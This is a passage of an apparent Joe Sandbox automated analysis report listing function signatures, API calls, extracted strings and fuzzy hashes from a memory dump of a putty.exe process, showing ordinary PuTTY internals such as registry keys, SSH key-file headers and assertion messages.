                      • Associated: the same seven .sdmp regions listed under the first Memory Dump Source entry above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Rect$ClientDeleteObject$DestroyIconInvalidateWindowZoomed
                      • String ID:
                      • API String ID: 1563564061-0
                      • Opcode ID: 9002f2a3961424ae94d7a4714d7ef1378bbf2c322a05b47b82e6b32c1cd67208
                      • Instruction ID: 616df6a09d9a7e387e039d05248c8bbcfaafccdfc50c7c907fba861066a1e765
                      • Opcode Fuzzy Hash: 9002f2a3961424ae94d7a4714d7ef1378bbf2c322a05b47b82e6b32c1cd67208
                      • Instruction Fuzzy Hash: C9324F739286129BE344CB39E88062A7BA1FB94764F244535D91DC3BA4DE3CFC459F48
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: the same seven .sdmp regions listed under the first Memory Dump Source entry above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$MZx
                      • API String ID: 808467561-2638907429
                      • Opcode ID: 76109444bee550de1c4388e330ad174438b70be0a494ba9c3e13dd96a3241d5f
                      • Instruction ID: aebd94a811b8e4f142f9c55a0b1e334e7a0f80ac0216b803e87846e9a9d17ff1
                      • Opcode Fuzzy Hash: 76109444bee550de1c4388e330ad174438b70be0a494ba9c3e13dd96a3241d5f
                      • Instruction Fuzzy Hash: 2EB29073A282829BE7658E74D5407FE2FE2FB54388F705135EA0997B84DF38A901DB44
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: the same seven .sdmp regions listed under the first Memory Dump Source entry above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: RectWindow$Dialog$MessageSend$CreateItemShow
                      • String ID: EDIT$STATIC
                      • API String ID: 2330346805-43825268
                      • Opcode ID: 6e7706600d2d904500700ed94df90ccb8346061f418200c8f03e5ae947f2dfbc
                      • Instruction ID: e0a500f4ff6bdd7c329f685893ea18433d98e1408572c0e534bdb42027a30c3a
                      • Opcode Fuzzy Hash: 6e7706600d2d904500700ed94df90ccb8346061f418200c8f03e5ae947f2dfbc
                      • Instruction Fuzzy Hash: 23A159766187808AE760CB26F84476BBBA1FBD9B84F604025DA8D87B58CF7CD945CF04
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: the same seven .sdmp regions listed under the first Memory Dump Source entry above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _invalid_parameter_noinfo$Module$FileHandleName
                      • String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program:
                      • API String ID: 3031022502-1508414584
                      • Opcode ID: d7d843c2f65a12b0c34e94e771a953dbeb68fb05c278f58f0e75c4f794b81323
                      • Instruction ID: bbe3481c26e9d491cfea18c64c9b16b17751947e330004beb81832286aef1cae
                      • Opcode Fuzzy Hash: d7d843c2f65a12b0c34e94e771a953dbeb68fb05c278f58f0e75c4f794b81323
                      • Instruction Fuzzy Hash: ACC13953F28353A0FA109B72A9106B76A65AF64FC0F604036DD0DD3BD1EE3DED00A649
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: the same seven .sdmp regions listed under the first Memory Dump Source entry above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CaptureCursorKeyboardMessageState$InfoLongMonitorReleaseSendShowTimeWindowZoomed
                      • String ID: (
                      • API String ID: 760066194-3887548279
                      • Opcode ID: 570241226dc569d8556a6d44eafd03aa757bfd8765273278d836e16b3d774ded
                      • Instruction ID: d45b6c4a58dfb675d28792fcfcb9c5b5baa0f5c019dbf7b4388620bb992bf072
                      • Opcode Fuzzy Hash: 570241226dc569d8556a6d44eafd03aa757bfd8765273278d836e16b3d774ded
                      • Instruction Fuzzy Hash: 77D1A027E3C6968AF7A48B35988537A6E90AF94750F340435CD4EC3A95CE6CFD40EB18
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: the same seven .sdmp regions listed under the first Memory Dump Source entry above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: htonl$HandleInformationIoctlsocket
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c$addr->addresses && step.curraddr < addr->naddresses$family == AF_UNSPEC
                      • API String ID: 156137457-251196645
                      • Opcode ID: 8971d0b1c7270a30c2299cc67f2fcacbd3c90aabaff784f71aa1d9edac9d5cce
                      • Instruction ID: c3ef669a9fe98795e55b86e54d756cae807fae75fca02037770e4c92e38f428c
                      • Opcode Fuzzy Hash: 8971d0b1c7270a30c2299cc67f2fcacbd3c90aabaff784f71aa1d9edac9d5cce
                      • Instruction Fuzzy Hash: C981D123A3860292FB648B249490A3A6AA0EF95760F244236D95DC77D4DF7CEC41DB4C
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: the same seven .sdmp regions listed under the first Memory Dump Source entry above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: DescriptorInitializeLocalSecurity$AllocateErrorFreeLast$AllocDaclOwner
                      • String ID: unable to allocate security descriptor: %s$unable to construct ACL: %s$unable to initialise security descriptor: %s$unable to set DACL in security descriptor: %s$unable to set owner in security descriptor: %s
                      • API String ID: 436594416-3066058096
                      • Opcode ID: d06c1e6c915d6b0c1d8c19af5bbfd37ba5b97767618dbb2da938d1d845b5b241
                      • Instruction ID: 03cd4fa9374550bdaec0906cb161fb2ac5b98fb9e9e53bdb525461e41f8acaae
                      • Opcode Fuzzy Hash: d06c1e6c915d6b0c1d8c19af5bbfd37ba5b97767618dbb2da938d1d845b5b241
                      • Instruction Fuzzy Hash: E9519F32A18A82A1F7618F29E4153A77BA0EF94740F204034DA8D87759DF7DDD46DB48
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: the same seven .sdmp regions listed under the first Memory Dump Source entry above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Keyboard$State$CountCounterLayoutMessagePerformanceProcQueryTickTranslateWindow
                      • String ID: +
                      • API String ID: 3269656489-2126386893
                      • Opcode ID: 5048b1fd3e11757cdc2f02bb580d9d34742875738b81cee9be2e4fa771e52dc8
                      • Instruction ID: 015b0230e9e24fe09b0e698bdc21a19fbf0bb7161a217c7da99aaf372040c4ca
                      • Opcode Fuzzy Hash: 5048b1fd3e11757cdc2f02bb580d9d34742875738b81cee9be2e4fa771e52dc8
                      • Instruction Fuzzy Hash: 9082D023E2C68285FBA08B34D4843BA2F91AF95394F344135CE8DC66D5DF6CEC859B19
                      APIs
                        • Part of subcall function 00007FF678616460: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF67861652D
                        • Part of subcall function 00007FF678616460: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF678616576
                      • GetProcAddress.KERNEL32 ref: 00007FF67860DB33
                        • Part of subcall function 00007FF67860E210: CreateFileA.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF67860DCDB), ref: 00007FF67860E25D
                      • GetEnvironmentVariableA.KERNEL32 ref: 00007FF67860DC25
                      • GetEnvironmentVariableA.KERNEL32 ref: 00007FF67860DC3B
                      • GetWindowsDirectoryA.KERNEL32 ref: 00007FF67860DCA5
                        • Part of subcall function 00007FF678616750: RegQueryValueExA.ADVAPI32(?,?,?,?,?,00000001,00000000,00007FF67860DAC6), ref: 00007FF67861678D
                        • Part of subcall function 00007FF678616750: RegQueryValueExA.ADVAPI32 ref: 00007FF6786167D4
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: the same seven .sdmp regions listed under the first Memory Dump Source entry above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CreateEnvironmentQueryValueVariable$AddressCloseDirectoryFileProcWindows
                      • String ID: HOMEDRIVE$HOMEPATH$RandSeedFile$SHGetFolderPathA$Software\SimonTatham\PuTTY$\PUTTY.RND$shell32.dll
                      • API String ID: 901926110-1528239033
                      • Opcode ID: 28cc407d49ef5bbbb69a0de68a39b9953fd264344be2787beb1a124646fe071b
                      • Instruction ID: dfbf2c871246c0cb7757d70483436448ac211915b844bd117db0b371a029b077
                      • Opcode Fuzzy Hash: 28cc407d49ef5bbbb69a0de68a39b9953fd264344be2787beb1a124646fe071b
                      • Instruction Fuzzy Hash: C961D562B3C65261FA209735A454BE71B909F88790F640231DE4DC77C6EE2CED45A70C
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: the same seven .sdmp regions listed under the first Memory Dump Source entry above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: File$Create$CloseCurrentDeleteErrorHandleLastPathProcessTempWrite
                      • String ID: %s::/%s.html>main$%s\putty_%lu_%llu.chm
                      • API String ID: 4085685679-1808412575
                      • Opcode ID: d976e458e8c62dd64c10ecddeec44299d36c0de5727f10c3b9b683b6b2cc316c
                      • Instruction ID: 686528646fca896883ea94f7c7c14443f91e29d9ebe80c83b745472df72e7d9e
                      • Opcode Fuzzy Hash: d976e458e8c62dd64c10ecddeec44299d36c0de5727f10c3b9b683b6b2cc316c
                      • Instruction Fuzzy Hash: DB51D123A2864292F6909B31A8487772FA0BB46BA4F340234DE1DC77C5CF7CEC459B08
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: the same seven .sdmp regions listed under the first Memory Dump Source entry above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Object$Select$Create$DeleteLineMovePixelPolyline
                      • String ID:
                      • API String ID: 1020918164-0
                      • Opcode ID: 450bcdd224cc7f4c6583d93fecdf1e34ce695ac6226fb09f393737156ed8a644
                      • Instruction ID: 624618667b3247c5bc42899d363534ec5e25908ac59769952121888d0a001400
                      • Opcode Fuzzy Hash: 450bcdd224cc7f4c6583d93fecdf1e34ce695ac6226fb09f393737156ed8a644
                      • Instruction Fuzzy Hash: 12719433A2865656F3508B35A88433ABB91BB94BA0F244036DE0DC7794DE7DED459B08
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: the same seven .sdmp regions listed under the first Memory Dump Source entry above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CloseHandleLocalProcess$AllocCopyCurrentErrorFreeLastLengthOpen
                      • String ID:
                      • API String ID: 621491157-0
                      • Opcode ID: be4c0ee50220b4914d8cbec88b3ec0bc8c3512ae49324cd7ad89bb247be0c340
                      • Instruction ID: 41cbc4b3274e8dcecca5c5be51bf67601dc78a832d587b05564cf6a82c788398
                      • Opcode Fuzzy Hash: be4c0ee50220b4914d8cbec88b3ec0bc8c3512ae49324cd7ad89bb247be0c340
                      • Instruction Fuzzy Hash: 54419227F2864252FA508B76A45473B6B91AF84F81F294034DD0EC7B89DE3CED45AB08
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: the same seven .sdmp regions listed under the first Memory Dump Source entry above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockMessageOpenSendUnlock
                      • String ID:
                      • API String ID: 4091238221-0
                      • Opcode ID: 951538910bdbc72113cd30d488f82dc269d8cb1585c1cd1720b85c1cf1ffabcc
                      • Instruction ID: 4b03735fbaa0865e168b762c3b563bef3e0b0920f6c59e904858bfbf03f03a55
                      • Opcode Fuzzy Hash: 951538910bdbc72113cd30d488f82dc269d8cb1585c1cd1720b85c1cf1ffabcc
                      • Instruction Fuzzy Hash: A921C123B2921295FB915F72A898B361F91AF61FD1F289034CD1DCA794CE3CED459B08
                      APIs
                      Strings
                      • *#****o~**+++++-----++++|****L., xrefs: 00007FF678618E0E
                      • CueaaaaceeeiiiAAE**ooouuyOUc$YPsaiounNao?++**!<>###||||++||++++++--|-+||++--|-+----++++++++##||#aBTPEsyt******EN=+><++-=... n2* , xrefs: 00007FF67861901F
                      • !cL.Y|S"Ca<--R~o+23'u|.,1o>///?AAAAAAACEEEEIIIIDNOOOOOxOUUUUYPBaaaaaaaceeeeiiiionooooo/ouuuuypy, xrefs: 00007FF678618D9A
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: the same seven .sdmp regions listed under the first Memory Dump Source entry above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ByteCharInfoMultiWide
                      • String ID: !cL.Y|S"Ca<--R~o+23'u|.,1o>///?AAAAAAACEEEEIIIIDNOOOOOxOUUUUYPBaaaaaaaceeeeiiiionooooo/ouuuuypy$*#****o~**+++++-----++++|****L.$CueaaaaceeeiiiAAE**ooouuyOUc$YPsaiounNao?++**!<>###||||++||++++++--|-+||++--|-+----++++++++##||#aBTPEsyt******EN=+><++-=... n2*
                      • API String ID: 2366317374-259461551
                      • Opcode ID: 3ce847713b9989b78afe54f3cac964a57e713b8776fab879d99fefa28a828a02
                      • Instruction ID: 101c89909acbc46e3871e2db24c0b2955f7c403caa7fabf7cb22b47365787459
                      • Opcode Fuzzy Hash: 3ce847713b9989b78afe54f3cac964a57e713b8776fab879d99fefa28a828a02
                      • Instruction Fuzzy Hash: 67C2C113D2878692F6224B34E8013FBA761FFA4704F149331DB9A515B2EF6CB9C5A709
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: the same seven .sdmp regions listed under the first Memory Dump Source entry above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CreateInstance
                      • String ID: Pageant.exe$Recent Sessions
                      • API String ID: 542301482-148644000
                      • Opcode ID: 7dde4ad06f94e58ba722ff84eb97f0fa8fb844da0378d740b24b288f643abab2
                      • Instruction ID: 99243b27e2aee0c04ac65ed9aabf4253b17e632d0b062c18512d584e4522ef0d
                      • Opcode Fuzzy Hash: 7dde4ad06f94e58ba722ff84eb97f0fa8fb844da0378d740b24b288f643abab2
                      • Instruction Fuzzy Hash: DDE15B37628A4692EB419B26E44436E7B61FB84B88F604032EE4E87764DF7DE905CB05
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d5412766714560a4fbff42f61eca60b5f976890a9ac266f06ccb218d8818102f
                      • Instruction ID: 5fa044f86482004fb285c3670967a95d6a5b495a6a62f76a3d11923e67a0000d
                      • Opcode Fuzzy Hash: d5412766714560a4fbff42f61eca60b5f976890a9ac266f06ccb218d8818102f
                      • Instruction Fuzzy Hash: 5EC1B063E2C68286F7A48B34A8847BA6E90AF94744F740435CE4DC66A1DF7CFC45DB18
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: $---- BEGIN SSH2 ENCRYPTED PRIVAT$---- BEGIN SSH2 PUBLIC KEY$-----BEGIN $-----BEGIN OPENSSH PRIVATE KEY$0123456789$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/=$PuTTY-User-Key-File-$SSH PRIVATE KEY FILE FORMAT 1.1
                      • API String ID: 0-166194441
                      • Opcode ID: 7ece83b8144924435dc628800ce00697e9af41aed47ab00858ca3585a7664754
                      • Instruction ID: 64ab46ad5c2118b2a9b5aec21b21710d4b7415d35397dbffbebd06a19f0f6984
                      • Opcode Fuzzy Hash: 7ece83b8144924435dc628800ce00697e9af41aed47ab00858ca3585a7664754
                      • Instruction Fuzzy Hash: 98C18223A28AC6A4FA21DB34E4553FB6761FBD4B44F608031CA8D83696DF3CDA49D744
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _invalid_parameter_noinfo
                      • String ID:
                      • API String ID: 3215553584-0
                      • Opcode ID: 183414eea92ac05355f01f144efcc7a106660819817fb9335955ce3f47e8f072
                      • Instruction ID: 485796ed3104cbe5ce503121d5a3b268426ed366913968a24cd4fedb9abd4648
                      • Opcode Fuzzy Hash: 183414eea92ac05355f01f144efcc7a106660819817fb9335955ce3f47e8f072
                      • Instruction Fuzzy Hash: 74C1EF27A28666A5E7609B3194442BF7F90FB91B80F650135DA4D833D1CE7CEC64A70A
                      APIs
                        • Part of subcall function 00007FF678616460: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF67861652D
                        • Part of subcall function 00007FF678616460: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF678616576
                        • Part of subcall function 00007FF678616750: RegQueryValueExA.ADVAPI32(?,?,?,?,?,00000001,00000000,00007FF67860DAC6), ref: 00007FF67861678D
                        • Part of subcall function 00007FF678616750: RegQueryValueExA.ADVAPI32 ref: 00007FF6786167D4
                      • RegCloseKey.ADVAPI32 ref: 00007FF67860D1E2
                      • RegCloseKey.ADVAPI32 ref: 00007FF67860D223
                      • RegCloseKey.ADVAPI32 ref: 00007FF67860D42F
                        • Part of subcall function 00007FF678616840: RegSetValueExA.ADVAPI32 ref: 00007FF678616873
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Close$Value$Query$Create
                      • String ID: %s@%d:$Software\SimonTatham\PuTTY\SshHostKeys$rsa
                      • API String ID: 306613542-1153710622
                      • Opcode ID: f409c6af9f2dbabcd250491df0d28a4a6c5a720deabbcc0a770a656b35dfe07a
                      • Instruction ID: 5de150b538d8deefd131bf9af7ef3b20f5752398cfd10889308c572e17c06742
                      • Opcode Fuzzy Hash: f409c6af9f2dbabcd250491df0d28a4a6c5a720deabbcc0a770a656b35dfe07a
                      • Instruction Fuzzy Hash: 3981C623F3D64261FA14973294557BB6A91AF45B84F645231EE0EC7386EE3CEC02E348
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: AddressCloseFileFindFirstHandleProc
                      • String ID: GetFileAttributesExA$P$kernel32.dll
                      • API String ID: 3854970465-2903979390
                      • Opcode ID: 4df7923f3d34a13ec1fca3f67debcc568d9fa5f0b123719f43d6eb1f8322b689
                      • Instruction ID: b5967db93cc8a63822222d95332180bb43eba3327b907c0633bfec042046a146
                      • Opcode Fuzzy Hash: 4df7923f3d34a13ec1fca3f67debcc568d9fa5f0b123719f43d6eb1f8322b689
                      • Instruction Fuzzy Hash: 6A21A323A29A4361FA21DB35B8043773B92AF84BA5F610271D85DC7794DF2CED15AB08
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/terminal/terminal.c$count234(term->screen) == newrows$count234(term->scrollback) <= newsavelines$count234(term->scrollback) >= term->tempsblines$sblen >= term->tempsblines$term->rows == count234(term->screen)$term->rows == newrows
                      • API String ID: 0-2137284441
                      • Opcode ID: c27046c877bbe28c414387422ba7976d0ecd375ec3d110cc09af1e6b29d4a1ca
                      • Instruction ID: 8fb76ca7049dbb853b2e2ec14f48d12d66cd118331b60ec56fdd1906d5964cf4
                      • Opcode Fuzzy Hash: c27046c877bbe28c414387422ba7976d0ecd375ec3d110cc09af1e6b29d4a1ca
                      • Instruction Fuzzy Hash: CE621573A2968186E750CF38D4447AE3BA4FB84B54F665235DA5D8B386EF3CE880C744
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: memcpy_s
                      • String ID: $MZx
                      • API String ID: 1502251526-1316729395
                      • Opcode ID: 680b90cf97a9c7fb76d7a62705229292c2faa968d74e11d542b3937a122fd231
                      • Instruction ID: 24dd1fd1fa8556a0daabce3322008024ba797872fd26a92c827b8d9f0cf0833c
                      • Opcode Fuzzy Hash: 680b90cf97a9c7fb76d7a62705229292c2faa968d74e11d542b3937a122fd231
                      • Instruction Fuzzy Hash: 81C10673B2868697D724CF69E148A6ABB91F784784F149139DB4A83B84DF3CEC05DB04
